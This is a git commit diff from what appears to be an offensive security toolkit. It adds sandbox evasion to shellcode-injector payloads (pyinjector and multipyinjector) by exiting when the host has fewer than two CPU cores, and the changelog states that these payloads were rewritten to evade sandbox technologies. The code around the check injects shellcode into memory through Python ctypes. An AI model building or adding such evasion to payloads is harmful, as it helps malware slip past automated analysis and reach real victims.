Update to add sandbox detection in payloads

This commit is contained in:
root 2015-05-03 22:08:30 -04:00
parent 7e33b55ab3
commit 6d445d3417
6 changed files with 17 additions and 1 deletions

View file

@ -1,3 +1,9 @@
~~~~~~~~~~~~~~~~
version 6.3.2
~~~~~~~~~~~~~~~~
* rewrote pyinjector and multipyinjector to evade sandbox technologies
~~~~~~~~~~~~~~~~
version 6.3.1
~~~~~~~~~~~~~~~~

View file

@ -230,7 +230,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '6.3.1'
define_version = '6.3.2'
return define_version
class create_menu:

View file

@ -18,6 +18,10 @@ from Crypto.Cipher import AES
import multiprocessing
import threading
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# define our shellcode injection code through ctypes
def injection(sc):
sc = sc.decode("string_escape")

View file

@ -1,12 +1,18 @@
#!/usr/bin/python
import ctypes
import sys
import multiprocessing
# Written by Dave Kennedy (ReL1K) @ TrustedSec.com
# Injects shellcode into memory through Python and ctypes
#
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# see if we specified shellcode
try:
sc = sys.argv[1]